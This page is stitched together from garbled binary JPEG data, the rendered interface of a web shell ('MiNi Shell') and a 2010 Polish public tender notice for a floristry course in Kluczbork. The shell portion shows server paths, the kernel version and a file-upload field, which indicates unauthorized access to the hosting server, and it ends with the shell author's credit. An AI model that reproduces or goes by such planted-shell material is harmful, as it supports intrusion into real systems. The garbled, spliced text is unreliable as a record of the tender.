JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/162576-N-2010.html

<p class="kh_header"><b>Kluczbork: Kurs florysta - bukieciarz z aranżacją wnętrz</b><br>
<b>Numer ogłoszenia: 162576 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kluczborku , ul. Sienkiewicza 22, 46-200 Kluczbork, woj. opolskie, tel. 077 4471388, faks 077 4187788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pupklb.one.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://pup.kluczbork.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs florysta - bukieciarz z aranżacją wnętrz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 15-osobowej grupy bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy  w Kluczborku pod nazwą  Kurs florysta - bukieciarz  z aranżacją wnętrz. Kategoria wg Wspólnego Słownika Zamówień CPV 80530000-8- usługi szkolenia zawodowego. Kurs przeznaczony jest dla osób bezrobotnych ze szczególnym uwzględnieniem osób zamieszkałych na wsi, długotrwale bezrobotnych, powyżej 50 roku życia, do 25 roku życia oraz innych osób znajdujących się w szczególnej sytuacji na rynku pracy ..Program szkolenia zgodny z załącznikiem nr 1 do SIWZ. Zamówienie ma być zrealizowane zgodnie z programem szkolenia, który powinien zawierać min. 150 godzin szkolenia. Zajęcia muszą odbywać się od poniedziałku do piątku, nie więcej niż 8 godzin dziennie.Miejsce szkolenia : teoria - Kluczbork , praktyka - Kluczbork.
Szkolenie powinno trwać nie mniej niż 30 godzin zegarowych w tygodniu 
(godzina = 60 minut, w tym ewentualne przerwy pomiędzy poszczególnymi zajęciami).
Nie przewiduje się łączenia przerw pomiędzy zajęciami i skumulowania ich na końcu danego dnia .
Program szkolenia. 
Wymagany minimalny program szkolenia : 
Teoria i praktyka :
1. Florystyka - wprowadzenie 
Omówienie istoty florystyki oraz podstawowych pojęć i zagadnień.
Przedstawienie historii florystyki oraz znaczenia kwiatów na przestrzeni dziejów.
Zapoznanie kursantów z anatomią, fizjologią, biologią i uprawą roślin ozdobnych.
Przedstawienie podziału i przeglądu roślin ozdobnych i możliwości ich wykorzystania we współczesnej florystyce.
Omówienie możliwości wykorzystania poszczególnych części roślin w układaniu kompozycji kwiatowych.
Omówienie warunków oraz miejsca pracy florysty.
 Zapoznanie uczestników z podstawowymi narzędziami, urządzeniami, akcesoriami 
 i pomocniczymi środkami technicznymi niezbędnymi do pracy florysty.
Prezentacja galanterii florystycznej: dodatków, artykułów dekoracyjnych , naczyń, środków od opakowania i ekspozycji.
Omówienie pielęgnacji i obróbki kwiatów ciętych, przedstawienie dogodnych warunków transportu i przechowywania kwiatów, metody odżywiania, ożywiania i przedłużania trwałości roślin ciętych. 
Omówienie metod utrwalania, suszenia i preparowania roślin
2. Florystyka - utrwalanie roślin
Omówienie metod utrwalania, suszenia i preparowania roślin.
Omówienie faz zbioru roślin i sposobów przygotowania do suszenia ze względu na rodzaj materiału i technikę suszenia.
Omówienie metody zielarskiej i sposobów przechowywania materiałów- praktyczne przygotowanie roślinności zielonej i spreparowanie jej metodą zielarską.
Omówienie metody zielnikowej: doboru roślin, sposobów przygotowania materiału, techniki suszenia przechowywania utrwalonych roślin.
Praktyczne przygotowanie roślinności zielonej i spreparowanie jej metodą zielnikową.
3. Florystyka - wiązanki okolicznościowe 
Wiązanki okolicznościowe - omówienie rodzajów bukietów i ich okazjonalności.
Przedstawienie rodzajów metod i technik wykonania oraz sposobów pakowania i prezentacji.
Wykonanie bukietów z kwiatów ciętych oraz dodatków roślin zielonych., z jednego kwiatu, z kilku kwiatów metodą spiralną na okrągło, z kilku kwiatów metodą spiralną jednostronną, z kilku kwiatów metodą równoległą .
Wiązanki okolicznościowe - omówienie techniki układania bukietów w ręce na konstrukcji.
Wykonanie  bukietów z kwiatów ciętych oraz dodatków roślin zielonych, z kilku kwiatów metoda równoległą , z kilku kwiatów na konstrukcji pionowej, z kilku kwiatów na konstrukcji poziomej
4. Florystyka - zabezpieczanie kwiatów 
Wykonanie  bukietów na konstrukcji.
Nauka zabezpieczania kwiatów przed utratą wody metodą watowania i woskowania.
Wykonie butonierki oraz ozdoby do włosów z kwiatów ciętych.
5. Florystyka - kompozycje z kwiatów ciętych 
Kompozycje z kwiatów ciętych w naczyniach -omówienie ich rodzajów, przedstawienie zasad stylistycznych i technicznych metod wykonawstwa.
Wykonanie w gąbce florystycznej 2 kompozycji (jednostronnej i wielostronnej) z kwiatów ciętych oraz dodatków roślin zielonych.
6. Florystyka ślubna 
Omówienie rodzajów, stylistyki , doboru i techniki tworzenia bukietów ślubnych oraz kompozycji na samochód.
Przedstawienie możliwości dekoracji sal i kościołów.
Wykonanie 2 bukietów ślubnych dwoma metodami : na mikrofonie i w ręce.
7. Florystyka komunijna 
Omówienie specyfiki florystyki komunijnej wraz z symboliką elementów kwiatowych.
Przedstawienie technik wykonania wianków i ozdób komunijnych oraz sposobu dekoracji florystycznej stołu.
Wykonanie wianków i bukiecików komunijnych z kwiatów ciętych oraz dodatków roślin zielonych
8. Florystyka żałobna 
 -   Omówienie rodzajów kompozycji żałobnych palm , wieńców i dekoracji trumny lub 
     urny.
 -  Wykonanie 2 palem pogrzebowych (na podkładzie gotowym i układaną w ręce). 
 -   Nauka wypisywania szarfy pogrzebowej.
Omówienie techniki wykonania wieńcy obręczowych.
Wykonanie wieńcy obręczowych z materiału żywego i udekorowanie ich kwiatami   
     ciętymi oraz sztucznymi.
Omówienie techniki wykonania wieńcy poduszkowych.
Wykonanie wieńcy poduszkowych z materiału żywego i udekorowanie ich kwiatami  
    ciętymi oraz sztucznymi
9. Florystyka wielkanocna 
- Omówienie rodzajów, stylistyki , doboru i techniki tworzenia bukietów wielkanocnych.
- Przedstawienie możliwości dekoracji stołów i kościołów.
- Wykonanie 2 bukietów wielkanocnych.
10. Florystyka bożonarodzeniowa
Omówienie symboliki i znaczenia dekoracji świątecznych oraz stylów i sposobów odświętnej dekoracji wnętrz z pomocą różnorakich elementów florystycznych.
Przedstawienie technik wykonawczych stroików świątecznych.
Wykonanie stroiki bożonarodzeniowe na bazie roślinności ciętej, suszonej, sztucznej i galanterii florystycznej.
Omówienie technik wykonawczych wianków i girland świątecznych.
Wykonanie wianków adwentowych oraz girlandów świątecznych na bazie roślinności ciętej, suszonej, sztucznej i galanterii florystycznej.
11. Florystyka - wianki i girlandy 
Metody wykonawstwa i techniki zdobienia.
Wykonanie wianków z materiału roślin zielonych oraz zdobienie ich elementami
suszu.
12. Florystyka - kompozycje z kwiatów sztucznych i suszonych 
Omówienie rodzajów i metod wykonania.
 Wykonanie 2 kompozycji ( w koszu wiklinowym i w naczyniu szklanym) z użyciem materiału sztucznego i suszonego.
13. Florystyka okolicznościowa
Omówienie sezonowości we florystyce oraz umiejętności wykorzystywania naturalnego materiału do dekoracji okolicznościowych.
Wykonanie kompozycji okolicznościowych ( komunijnej lub świątecznej) na stół oraz na serwetniki
14. Aranżacja wnętrz - omówienie stosowanych roślin doniczkowych 
Kwiaty doniczkowe - omówienie podziału, uprawy i pielęgnacji.
Przedstawienie możliwości wykorzystania kwiatów doniczkowych do dekoracji i aranżacji pomieszczeń.
15. Aranżacja wnętrz - dekoracje witryn oraz wnętrz
      1) Dekoracje witryn sklepów oraz wnętrz na różne okazje
      a) Okno wystawowe wizytówką sklepu
estetyka witryny: czystość, regularna zmiana dekoracji, właściwa ekspozycja
           towaru,
        - dobór tematyki aranżacji.
      b) Rola koloru i światła w dekoracji
        - paleta barw - kolory podstawowe, pochodne, kontrastowe i neutralne,
        - natężenie światła w kolorach.
      c) Zapoznanie z kierunkiem patrzenia i najważniejszymi punktami w dekoracji witryny,   
         postrzeganymi przez obserwatora - widza.
      d) Warsztaty.
2) Dekoracje witryn sklepów oraz wnętrz na rożne okazje 
        a) Zaprezentowanie i omówienie przykładów dekoracji i aranżacji witryn sklepów 
            różnych branż.
        b) Przykłady dekoracji 
      - z okazji ślubu - kościół, sala, dom Panny Młodej
      - z okazji komunii - stół, sala.
         c) Warsztaty.
16. Ozdobne pakowanie prezentów 
      1) Ozdobne pakowanie prezentów
     a) Omówienie tradycji obdarowywania się prezentami, zwrócenie uwagi na potrzebę estetycznego opakowania  i ozdabiania upominku.
     b) Artykuły dekoracyjne, narzędzia i materiały stosowane do pakowania prezentów - omówienie i prezentacja.
     c) Nauka pakowania podstawowego
- przycinanie papieru
- zaginanie papieru
- przyklejanie papieru
d) Japoński sposób pakowania przedmiotów o różnych kształtach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy dla siedziby wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że przeprowadził co najmniej 2 szkolenia grupowe w  zakresie objętym zamówieniem  lub podobnym w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem przedmiotu, daty wykonania i odbiorców wraz z załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie ( np. referencje)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia i będzie posiadała doświadczenie zawodowe z zakresu objętego zamówieniem .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie z art. 22 ust. 1 ustawy (zgodnie z załącznikiem nr 2  do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Wypełniony formularz ofertowy - załącznik nr 7 do SIWZ. 2. Oświadczenie Wykonawcy o spełnianiu warunków, o których mowa w art. 22ust.1, ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2007 Nr 223 poz. 1655 z póź. zm.).3.Wpis  do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki urząd pracy właściwy dla siedziby wykonawcy.4.Wykaz kadry dydaktycznej przewidzianej do realizacji zamówienia załącznik nr 3 do SIWZ.5.Wykaz wykonanych szkoleń - załącznik nr 4 do SIWZ.6. Wykaz narzędzi i materiałów szkoleniowych - zgodnie z załącznikiem nr 5 do SIWZ.7.  oświadczenie o braku podstaw do wykluczenia - zgodnie z załącznikiem nr 6 do SIWZ.8.dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty (np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy) wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 35</li>
<li>2 - Doświadczenie kadry dydaktycznej - 25</li>
<li>3 - Doświadczenie Wykonawcy - 15</li>
<li>4 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
<li>5 - Materiały szkoleniowe i pomoce dydaktyczne - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególnie uzasadnionych przypadkach Zamawiający przewiduje możliwość wprowadzenia zmian w umowie dotyczących: 1 zmniejszenia do 10 % liczby osób i kosztu szkolenia, gdy liczba zainteresowanych szkoleniem osób bezrobotnych będzie mniejsza niż planowana w umowie, 2.miejsca szkolenia: a) w przypadku, gdy Wykonawca zaproponuje lepsze warunki lokalowe niż wymienione w ofercie, b) w przypadku awarii sali szkoleniowej lub budynku uniemożliwiającej przeprowadzenie zajęć, c) kiedy umowa miedzy Wykonawca a właścicielem sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nie leżących po stronie Wykonawcy, 3.harmonogramu przeprowadzonych zajęć, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu ze względów zdrowotnych lub zawodowych nie może przeprowadzić zajęć w danym terminie lub gdy zajdą przesłanki z pkt 28.5.4 4. kadry dydaktycznej, w przypadku, gdy zostanie rozwiązana umowa miedzy Wykonawcą a wykładowcą lub kiedy wykładowca przewidziany do realizacji danego modułu z przyczyn nie leżących po stronie Wykonawcy nie może kontynuować zlecenia zastrzegając jednocześnie, że nowy wykładowca musi spełniać wymagania określone dla danego wykładowcy co najmniej takie jak w składanej ofercie lub wyższe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.kluczbork.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kluczborku , 46-200 Kluczbork ul.Sienkiewicza 22b...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2010 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Kluczborku , 46-200 Kluczbork ul.Sienkiewicza 22b, parter (sekretariat pok.1)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Postaw na siebie jest współfinansowany przez Unię Europejską ze środków EFS..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com